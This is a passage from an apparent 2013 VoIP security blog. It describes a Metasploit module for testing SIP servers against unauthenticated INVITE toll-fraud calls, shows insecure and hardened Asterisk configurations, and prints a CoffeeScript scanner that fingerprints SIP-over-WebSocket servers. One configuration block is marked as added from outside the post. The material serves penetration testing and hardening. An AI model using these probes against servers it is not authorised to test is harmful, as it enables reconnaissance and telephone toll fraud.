<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_1xcjockAZQAXiWnppS6fG7LQWKwK_cYF7jkPHeYR_5VnFYhymDAhUSZYfvslg2ULPOtEpYQgbm9oe0icJVz7pb5EmllR3y7e_gBGfgGSKsZOpLzOBAP86r6-3vcRmzTrbJRmEWFtpEs/s1600/Captura+de+pantalla+de+2013-02-26+11:49:40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_1xcjockAZQAXiWnppS6fG7LQWKwK_cYF7jkPHeYR_5VnFYhymDAhUSZYfvslg2ULPOtEpYQgbm9oe0icJVz7pb5EmllR3y7e_gBGfgGSKsZOpLzOBAP86r6-3vcRmzTrbJRmEWFtpEs/s400/Captura+de+pantalla+de+2013-02-26+11:49:40.png" width="400" /></a></div>
<br />
<br />
In conclusion, I like Horrible.js with factor 3. In my opinion, it makes no sense to pay for mitigating a risk that is impossible to eliminate completely.<br />
<br />
</div>
</div>
<h3>SIP INVITE attack with Metasploit</h3>
2013-01-19<br />
<div style="text-align: start;">
Some days ago my friend <a href="https://twitter.com/pepeluxx" target="_blank">@pepeluxx</a> wrote <a href="http://blog.pepelux.org/2013/01/05/asterisk-%E2%80%93-invite-attack-ii/" target="_blank">another post</a> about INVITE attacks. He talked about a <a href="https://twitter.com/sinologicnet" target="_blank">@sinologic</a> <a href="http://www.sinologic.net/blog/2010-04/test-sip-sinologic/" target="_blank">project</a> which allows everybody to run some security tests against SIP servers. Furthermore, he also published a Perl script to do the same task. So I implemented it in Metasploit because I think it could be really useful during a pentest. It's interesting because these attacks are really dangerous: normally, attackers try to call expensive destinations. These target numbers often carry special charges, and that is how they make money. Here are two well known examples:</div>
<div style="text-align: start;">
<br /></div>
<ul style="text-align: start;">
<li><a href="http://blog.sipvicious.org/2010/12/11-million-euro-loss-in-voip-fraud-and.html">http://blog.sipvicious.org/2010/12/11-million-euro-loss-in-voip-fraud-and.html</a></li>
<li><a href="http://snapvoip.blogspot.com.es/2009/02/calls-to-cuba-and-voip-attacks.html">http://snapvoip.blogspot.com.es/2009/02/calls-to-cuba-and-voip-attacks.html</a></li>
</ul>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
I'm not going to go deep into this vector because it is a well known (and old!!) one. Basically the attacker tries to make a call through a misconfigured PBX. This is possible because the <a href="http://www.ietf.org/rfc/rfc3261.txt" target="_blank">SIP RFC</a> says that an extension does not need to be registered to make a call, only to receive one. Most SIP servers can require authentication both when registering and when calling (and even when hanging up a call, which prevents <a href="http://www.youtube.com/watch?v=Rq-UULauLzc" target="_blank">SIP Teardown</a> (BYE) attacks). But only a few of them ship with this configuration enabled by default; most of them authenticate only the registration. For example, in Asterisk we should set <i>"allowguest=no"</i> in the <i>"sip.conf"</i> file so that every call (INVITE) is authenticated. Apart from this, sysadmins should also be very careful when defining the dialplan. A common example of what <b>not to do</b> is the following, where the outbound (to the <a href="http://en.wikipedia.org/wiki/Public_switched_telephone_network" target="_blank">PSTN</a>) calls context is included in the default one:</div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
(<b>sip.conf</b> file)</div>
<div style="text-align: start;">
<i>[general]</i></div>
<div style="text-align: start;">
<i>context=default</i></div>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
(<b>extensions.conf</b> file)</div>
<div style="text-align: start;">
<i>[default]</i></div>
<div style="text-align: start;">
<i>include => outbound</i></div>
<div style="text-align: start;">
<br /></div>
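The misconfiguration above next to a hardened equivalent, as an added example that is not taken from the post. The peer <i>1001</i>, its secret and the trunk called <i>trunk</i> are placeholders and the context names are illustrative; the point is that no unauthenticated request must ever land in a context that includes the outbound route.

```ini
; --- INSECURE (the case the post warns about) -------------------------------
; sip.conf
[general]
context=default          ; unauthenticated (guest) INVITEs land in this context
allowguest=yes           ; old Asterisk default: accept INVITEs from unknown peers

; extensions.conf
[default]
include => outbound      ; guests inherit the PSTN route: toll fraud

[outbound]
exten => _9X.,1,Dial(SIP/${EXTEN:1}@trunk)   ; "trunk" is a placeholder peer name

; --- HARDENED ---------------------------------------------------------------
; sip.conf
[general]
context=public           ; dead-end context for anything that did not authenticate
allowguest=no            ; reject INVITEs from peers that cannot authenticate
alwaysauthreject=yes     ; same 401 for unknown and wrong-password users

[1001]                   ; placeholder peer
type=friend
secret=CHANGE_ME         ; placeholder secret
host=dynamic
context=internal         ; only authenticated peers reach a context with a trunk route

; extensions.conf
[public]
exten => _X.,1,Hangup()  ; no "include => outbound" here

[internal]
include => outbound
exten => _1XXX,1,Dial(SIP/${EXTEN})

[outbound]
exten => _9X.,1,Dial(SIP/${EXTEN:1}@trunk)
```

The check for the hardened version is the one the module in this post performs: an INVITE from an unregistered source should be answered with a 401/407 challenge or a 403, never routed.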
<div style="text-align: start;">
I committed the module to <a href="https://github.com/jesusprubio/metasploit-sip" target="_blank">my Github project</a>, it only implements a SIP INVITE request where the user can provide next parameters:</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh21iUq8ZixRl63x2DHhbbqlpG1FaDtOfmfggoXxPaAhnP5yoFQEmeYvEROCxCA0cHRUuQd5rK-JDw5FO5XWF6LV0nd9kA6ucZO7B7cXubI08qEQxeRNMyPh0pK_aSlCcDuwKDgOzYLryw/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh21iUq8ZixRl63x2DHhbbqlpG1FaDtOfmfggoXxPaAhnP5yoFQEmeYvEROCxCA0cHRUuQd5rK-JDw5FO5XWF6LV0nd9kA6ucZO7B7cXubI08qEQxeRNMyPh0pK_aSlCcDuwKDgOzYLryw/s400/1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 13px;">Module parameters</td></tr>
</tbody></table>
<div style="text-align: start;">
<br />
You should try calling both a regular phone number (you can see one in the last picture) and an extension, because servers normally behave differently for each. The code simply sends an INVITE request with the provided options and then parses the response. If it is a <i>"Trying"</i>, you could be in trouble, man. ;) Keep in mind that a 100 Trying is only provisional: what really settles it is whether the server challenges the INVITE (401/407) or refuses it (403) instead of routing the call.</div>
<div style="text-align: start;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfOgiBkvRfNl-c2_CYNaSL7bosUmjwwH0TpzsbfndjS2nIae6dQEZShgaYlxYPN1w_vuZoK2sWAHjVSvmPQwj6V-BQ5pHjXNlcKlRnedQzhm6mXlWtkUJBBU64jQHNiY5kBZSwlFIaMHk/s400/15.png" width="400" /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqRDpCXep66MF60XoWLodLhmgH5xG4mUhI4DKUhihoIkc57ELqPnjROSaD-DCEXPD3nOVApudkJfqVon8CySWbanmgNlOu6UztMzhkGrL6QCzPXsPY9WNkFFpIi8cw-Xt4MYC68MQ4sN0/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqRDpCXep66MF60XoWLodLhmgH5xG4mUhI4DKUhihoIkc57ELqPnjROSaD-DCEXPD3nOVApudkJfqVon8CySWbanmgNlOu6UztMzhkGrL6QCzPXsPY9WNkFFpIi8cw-Xt4MYC68MQ4sN0/s400/3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 13px;">Possible insecure system</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRdDLhMifRpVAjhZ3RfouKsJz_hTGSnS66TTfC9drQy5YPjBSPHbQJR1JiOPJdbrNYOpdS41_hkkSaKKjBiwrMy8z3IjJNvPnc5oNKN81BOCm379RuaW-5t3QJMWsrNyYlyeWmmZ1V2Yo/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRdDLhMifRpVAjhZ3RfouKsJz_hTGSnS66TTfC9drQy5YPjBSPHbQJR1JiOPJdbrNYOpdS41_hkkSaKKjBiwrMy8z3IjJNvPnc5oNKN81BOCm379RuaW-5t3QJMWsrNyYlyeWmmZ1V2Yo/s400/2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Possible insecure system</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaeyMkqVNu8miVw1Bj9k5MC3cX4WCOmwJcL6dpFTZGNsp_igKNS_zeLOsi06l4rdr94PWPT4KLikOBkKSsfp8wFMoTxCFY9W_VSKkFBTLqflpch6Em_OtBPnwa2c8tyMLu2Hjur7kaDAU/s1600/26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaeyMkqVNu8miVw1Bj9k5MC3cX4WCOmwJcL6dpFTZGNsp_igKNS_zeLOsi06l4rdr94PWPT4KLikOBkKSsfp8wFMoTxCFY9W_VSKkFBTLqflpch6Em_OtBPnwa2c8tyMLu2Hjur7kaDAU/s400/26.png" width="400" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZHp6oi2U-BY5bejT10SFCMIc1q74R2bg3RzU_NEebfheuj3fy-2B9Uq_gL_hIy1qheh3VckCypKulf-erybLJSxZVhFfneB9mgszxBXoUk9HK8gCXvnhyr6jGiZR8WNoRmHXt25BtK0w/s1600/Captura+de+pantalla+de+2013-01-19+13:50:09.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZHp6oi2U-BY5bejT10SFCMIc1q74R2bg3RzU_NEebfheuj3fy-2B9Uq_gL_hIy1qheh3VckCypKulf-erybLJSxZVhFfneB9mgszxBXoUk9HK8gCXvnhyr6jGiZR8WNoRmHXt25BtK0w/s400/Captura+de+pantalla+de+2013-01-19+13:50:09.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Secure system to this vector</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
These are the links to the UDP and TCP versions of the tool. Remember that Metasploit modules which support TCP also support TLS. You can change the protocol version and other optional parameters with the <i>"show advanced"</i> command.<br />
<ul>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipinvite.rb" target="_blank">UDP</a></li>
<li><a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipinvite_tcp.rb" target="_blank">TCP</a></li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBouJAkxKus8cq5FQy8QK32XGwLsCr0vKHsBvX8yt9dWT_3xAOIcG99q2wfNd2cP0gRM1-sZMJAjZpwlFaTu66cI0KB7WcBfaStbqB8WJRTKjht9vayQcdXQ6fIn1MWhdEigIt_-MaeAI/s1600/Captura+de+pantalla+de+2013-01-19+14:33:45.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBouJAkxKus8cq5FQy8QK32XGwLsCr0vKHsBvX8yt9dWT_3xAOIcG99q2wfNd2cP0gRM1-sZMJAjZpwlFaTu66cI0KB7WcBfaStbqB8WJRTKjht9vayQcdXQ6fIn1MWhdEigIt_-MaeAI/s400/Captura+de+pantalla+de+2013-01-19+14:33:45.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Advanced options</td></tr>
</tbody></table>
<br />
Finally, I want to mention that in the last few days I was reviewing my SIP Metasploit modules, trying to add some more features (like SIP proxy support), and I found that they are a mess: there is a lot of repeated code and they are hard to maintain. So, after talking with some Metasploit guys on the IRC channel, I'm going to write a new SIP Proto class (<i>"lib/rex/proto/sip.rb"</i>) and a <a href="http://www.offensive-security.com/metasploit-unleashed/Mixins_and_Plugins" target="_blank">Mixin</a> (<i>"lib/msf/core/auxiliary/sip.rb"</i>) which uses it. Once that is done, I'm going to submit all the SIP modules I have developed to the official Metasploit distribution.<br />
<br />
Ref: <a href="http://www.sinologic.net/blog/2009-02/la-voip-mal-configurada-llama-a-cuba/">http://www.sinologic.net/blog/2009-02/la-voip-mal-configurada-llama-a-cuba/</a>Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-60757398217183492382013-01-16T09:15:00.000+01:002013-02-01T15:51:37.217+01:00Playing with QoffeeSIP: SIP over websocket scannerSome weeks ago we published <a href="http://qoffeesip.quobis.com/" target="_blank">QoffeeSIP</a>, the JavaScript <a href="https://datatracker.ietf.org/doc/draft-ietf-sipcore-sip-websocket/" target="_blank">SIP over WebSockets</a> stack we use to develop our WebRTC products at <a href="http://www.quobis.com/" target="_blank">Quobis</a>. One example is <a href="http://www.quobis.com/index.php?option=com_content&task=view&id=19&Itemid=30" target="_blank">IdentityCall</a>, a system designed to provide call authentication in traditional VoIP and IMS environments. Now it achieves the same goal in WebRTC ones, interconnecting them at the same time with the <a href="http://en.wikipedia.org/wiki/Public_switched_telephone_network" target="_blank">PSTN</a>.<br />
<br />
Today I'm showing a different use case from those proposed in the <a href="https://quobis.atlassian.net/wiki/display/QoffeeSIP/Examples+of+use" target="_blank">examples</a> (the <i>"simplest-example"</i> and a <i>"webphone"</i>): a simple (but surely the first one in the world ;) SIP over WebSockets server scanner. It sends a valid SIP (over WebSockets) request, parses the interesting information from the response (i.e. the <i>"User-Agent"</i> header) and prints it. I'm using the simplest example as a basis; these are the changes I made to the code:<br />
<ul>
<li>No HTML video tags are passed to the constructor, because we only use the WebSocket features of the stack, not the WebRTC ones.</li>
<li>Some elements were removed from the interface so it only asks for the needed parameters (IP address, port and, optionally, the extension used for the registration).</li>
<li>The media parts were also deleted from the <i>script.coffee</i> file, which defines the logic of the app.</li>
<li>Obviously the logic itself has to change, so I added some code at the end: when state 2 (registering after the challenge) or 3 (registered) is reached, the received message is parsed.</li>
<li>The <i>"User-Agent"</i>, <i>"Server"</i> and <i>"Organization"</i> headers are extracted from that response and printed. Actually we read them from an object with the property <i>"frame"</i>, which holds the raw SIP message.</li>
<li>Finally, the makefile is modified to generate the output with the correct name.</li>
</ul>
<br />
<br />
<b>script.coffee</b>
<br />
<pre class="brush:ruby">##
# Copyright (C) Quobis
# Project site: https://github.com/Quobis/QoffeeSIP
#
# Licensed under GNU-LGPL-3.0-or-later (http://www.gnu.org/licenses/lgpl-3.0.html)
##

# On document ready...
$ ->
  # Avoid page "reloading" on submit.
  $("form").submit (e) ->
    e.preventDefault()
    false

  # The stack API object, created when the form is submitted.
  api = null

  $("#init").submit =>
    options =
      # No video tags: only the WebSocket part of the stack is used.
      server: {ip: $("#server-ip").val(), port: $("#server-port").val()}
      onopen: =>
        api.register "qoffeesip", "anonymous"
    api = new API options
    api.on "new-state", (state, message) ->
      switch state
        # 2: registering after the 401 challenge, 3: registered.
        # Both states carry a response from the server in message.frame (raw SIP text).
        when 2, 3
          # Headers that reveal the server implementation.
          fingerprintREs = [/User-Agent:(.*)/i, /Server:(.*)/i, /Organization:(.*)/i]
          found = []
          for re in fingerprintREs
            match = re.exec message.frame
            found.push match[0].trim() if match
          # Print every header that matched instead of only the first one,
          # and avoid a TypeError when none of them is present.
          output = if found.length then found.join(" | ") else "No fingerprint headers in the response"
          $("#output").text output</pre>
<br />
<b>index.jade</b>
<br />
<pre class="brush:html">//-
//- @source: https://github.com/Quobis/QoffeeSIP
//- Copyright (C) Quobis
//- Licensed under GNU-LGPL-3.0-or-later (http://www.gnu.org/licenses/lgpl-3.0.html)
//-
!!!
head
  title SIP over websockets scanner
  script(src="lib/jquery-1.8.0.min.js")
  script(src="lib/spine.js")
  script(src="lib/underscore.js")
  script(src="lib/qoffeesip.js")
  script(src="script.js")
body
  form(id="init")
    input(id="server-ip", type="text", placeholder="Server IP", required)
    input(id="server-port", type="number", placeholder="Port", required)
    input(type="submit", value="Scan")
  div(id="output")</pre>
<div style="text-align: center;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<br />
<div style="text-align: left;">
I have committed this example to the <a href="https://quobis.atlassian.net/wiki/display/QoffeeSIP/Examples+of+use" target="_blank">QoffeeSIP examples of use</a>, so you can download and use it as explained in the project's <a href="https://quobis.atlassian.net/wiki/display/QoffeeSIP/Quick+start+guide" target="_blank">QuickStart guide</a>. The command <i>"make build"</i> (or simply <i>"make"</i>) puts the output files in the <i>"dist"</i> folder. Then you only have to move them to an HTTP server, like Apache. You could follow these steps:</div>
</div>
<br />
- Make sure CoffeeScript and Jade are installed on your system; if not, you can install them with npm (<i>"coffee-script"</i> and <i>"jade"</i>).<br />
<br />
<div>
- Download the examples using git (the clone is created in a directory named <i>QoffeeSIP</i>, with that capitalisation):</div>
<div>
<div>
<i>git clone https://github.com/Quobis/QoffeeSIP.git</i><br />
<i>cd QoffeeSIP/examples/sipwebsockets-scanner</i></div>
<div>
<br />
- Generate the files to distribute:<br />
<i>make</i></div>
<div>
<br />
- Copy them to your Apache server:<br />
<i>sudo cp -R dist/* /var/www</i><br />
<br />
Here are a few screenshots:</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihEtbVErP3-fwgjTCmH1vD9t3r_lDWVQanqAwUSa1eEwVhpF4_v3HSb4yLpU0cf8GfzLaPc0w8UaEHAXrKFRV66TJJ2VGNe4Iym1eSf-KFvnXOQ8t1hToJnxgxekJCNDwTfjiUNKLG3Vo/s1600/0.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihEtbVErP3-fwgjTCmH1vD9t3r_lDWVQanqAwUSa1eEwVhpF4_v3HSb4yLpU0cf8GfzLaPc0w8UaEHAXrKFRV66TJJ2VGNe4Iym1eSf-KFvnXOQ8t1hToJnxgxekJCNDwTfjiUNKLG3Vo/s400/0.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="separator" style="clear: both; font-size: medium;">
<span style="font-family: inherit; white-space: pre-wrap;"><span style="font-size: x-small;">Scanner setup</span></span></div>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"></span></div>
<div>
<div style="text-align: center;">
<div style="display: inline !important;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEskntWKkioTOXNo-HDH6F6VHMSgJ2yKu0wDAm89EiAKGHD5ikeFylnWdu-VZgi6KxieBCwknv3p1ALM9vFPlz8GHJ-XLTbsR_x9CMQji9cmzuyuiic3TqaX_gRRvH7aprK1G3ZrA4kuM/s1600/Captura+de+pantalla+de+2013-01-16+01:35:37.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEskntWKkioTOXNo-HDH6F6VHMSgJ2yKu0wDAm89EiAKGHD5ikeFylnWdu-VZgi6KxieBCwknv3p1ALM9vFPlz8GHJ-XLTbsR_x9CMQji9cmzuyuiic3TqaX_gRRvH7aprK1G3ZrA4kuM/s400/Captura+de+pantalla+de+2013-01-16+01:35:37.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: small;">S</span><span style="font-family: inherit; font-size: x-small; vertical-align: baseline; white-space: pre-wrap;">canning IdentityCall server</span></td></tr>
</tbody></table>
</div>
</div>
<span style="font-family: inherit;"><span style="font-size: x-small;">
</span>
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9JB8BsgudOAO0U_UuaMpnSpRI0YO1uzpNu6OnjMQs-ZvwDIUVlxskciCSPq4B5lfP8eB6U2MJkHSYXuYNgH2ub_O06OcWROY3eoxUAPHVmihCDde1q-MwaqOosy_pYiy49SQfzpvorv8/s1600/Captura+de+pantalla+de+2013-01-16+01%253A36%253A00.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9JB8BsgudOAO0U_UuaMpnSpRI0YO1uzpNu6OnjMQs-ZvwDIUVlxskciCSPq4B5lfP8eB6U2MJkHSYXuYNgH2ub_O06OcWROY3eoxUAPHVmihCDde1q-MwaqOosy_pYiy49SQfzpvorv8/s400/Captura+de+pantalla+de+2013-01-16+01%253A36%253A00.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: inherit; font-size: x-small; white-space: pre-wrap;">Scanning </span><span style="font-family: inherit; font-size: x-small; vertical-align: baseline; white-space: pre-wrap;">Kamailio</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; font-size: x-small;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
In a real tool, for best results, we should make some improvements like these:</div>
<div style="text-align: left;">
- Use OPTIONS requests, since they are more accurate for this purpose.</div>
<br />
- Add support for ranges of IP addresses.<br />
- Avoid asking for permission to use the webcam and/or microphone. They are not actually used, but it's a limitation of the stack: we decided to make this request during registration instead of during a call for usability reasons.<br />
- Use <a href="http://twitter.github.com/bootstrap/" target="_blank">Bootstrap</a> to get a friendlier interface.<br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"></span><br /></span>
But this is only a proof of concept, so I think it is good enough for now. The goal of this post is to show a different way of playing with the stack. Anyway, if you are interested in more professional tools, I'm going to add WebSocket support to my <a href="https://github.com/jesusprubio/metasploit-sip" target="_blank">SIP Metasploit modules</a> at some point.<br />
In the same way, if you are interested in a more complex application you can visit <a href="http://talksetup.quobis.com/" target="_blank">the online demo</a>, which implements the <i>"webphone"</i> example of use. You can play with it too, and if you need help you can always open an issue on the <a href="https://github.com/Quobis/QoffeeSIP" target="_blank">Github repository</a>.<br />
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOx_DwcF3g6Zrz_zmQznF6zIG6bQNYLVuE-jVgaD1Va21gSyZluI1KpPzHI1QJ7soEbAkq8vL0w-1Uia5hiOEHf0ms7vYvoUz_TuW5mzoiMrsK-OPw9lnr8Pd4XdR90nha4Pqe3UaKSuY/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOx_DwcF3g6Zrz_zmQznF6zIG6bQNYLVuE-jVgaD1Va21gSyZluI1KpPzHI1QJ7soEbAkq8vL0w-1Uia5hiOEHf0ms7vYvoUz_TuW5mzoiMrsK-OPw9lnr8Pd4XdR90nha4Pqe3UaKSuY/s400/3.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small; white-space: pre-wrap;">QoffeeSIP demo</span></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"></span></div>
<b style="font-weight: normal;">
</b></div>
</div>
Anonymoushttp://www.blogger.com/profile/09565740223441207640noreply@blogger.comtag:blogger.com,1999:blog-7743819158194184549.post-74859155213395039152012-10-08T13:03:00.001+02:002013-01-19T18:27:11.663+01:00Fixing some SIP related Metasploit modules<div style="text-align: justify;">
Hi again. While I was checking some demos for <a href="http://nicerosniunos.blogspot.com.es/2012/09/voip-class-at-vigo-university.html" target="_blank">our class</a> at Vigo University, representing <a href="http://quobis.com/">Quobis</a>, I noticed that the Metasploit <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/sip/options.rb" target="_blank">options.rb</a> module (SIP scanning) wasn't working properly: it was unable to recognize a Kamailio server. The next two pictures show the difference with the SIPVicious output:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLVhyuxMC_66mSA4JpbXLE-CS4-DPCJdA28BInykOGudaHJtbXAP3z4-6EiOgO7gW_gIYmbDJ3A5sLDQUrzOwKMWx-m5qvgcxUraHTT1Fq3kYyofEEVOY1BZ5-d8lJux1IIUixph1TTE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbLVhyuxMC_66mSA4JpbXLE-CS4-DPCJdA28BInykOGudaHJtbXAP3z4-6EiOgO7gW_gIYmbDJ3A5sLDQUrzOwKMWx-m5qvgcxUraHTT1Fq3kYyofEEVOY1BZ5-d8lJux1IIUixph1TTE/s400/1.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdoOFr8imqRGqHh7jY7YBQ5cmLvYbLT0W895qAAtwNRyu4n7tm205TxPn1khYFqNQPx_cMqMh7Ql21WxGfnICQRm374Lf_ORH-xqKUwT6zZ7STVCpO57y0oM7vqe2G0zx311ez4wW3FE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZdoOFr8imqRGqHh7jY7YBQ5cmLvYbLT0W895qAAtwNRyu4n7tm205TxPn1khYFqNQPx_cMqMh7Ql21WxGfnICQRm374Lf_ORH-xqKUwT6zZ7STVCpO57y0oM7vqe2G0zx311ez4wW3FE/s400/2.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Some time ago I wrote <a href="http://nicerosniunos.blogspot.com.es/2011/09/voip-information-gathering-metasploit.html">a post</a> about this module, and I remember being a bit surprised because the code doesn't respect the SIP protocol at all (but it worked with Asterisk). After a quick look at the Kamailio logs my suspicions were confirmed: the <a href="http://www.kamailio.net/docs/modules/1.6.x/sanity.html">Sanity module</a> was doing its job correctly, dropping these packets. :)</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRK4f8npV11QX5NDUKj3PwsU-pKeIzgZny_RjfJp3M7MJBfKCLlByfe2sWV7Y5ayR9jDz1OJDVehTUo9yO7tmnzTVma_E4-DMvPEndkSBBs-y4bi7mOlkWESrFb5bvyzJJ3z3AIjBP2c/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMRK4f8npV11QX5NDUKj3PwsU-pKeIzgZny_RjfJp3M7MJBfKCLlByfe2sWV7Y5ayR9jDz1OJDVehTUo9yO7tmnzTVma_E4-DMvPEndkSBBs-y4bi7mOlkWESrFb5bvyzJJ3z3AIjBP2c/s400/4.png" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The next function defines how requests are created in the current module. If you are familiar with the <a href="http://www.ietf.org/rfc/rfc3261.txt">SIP RFC</a> you will probably notice what I'm talking about. If not, I suggest comparing it with the <i>create_request</i> function of my <a href="https://github.com/jesusprubio/metasploit-sip/blob/master/sipflood.rb" target="_blank">sipflood.rb</a> module.</div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
<pre style="font-family: Trebuchet MS, sans-serif; font-size: x-small;">def create_probe(ip)
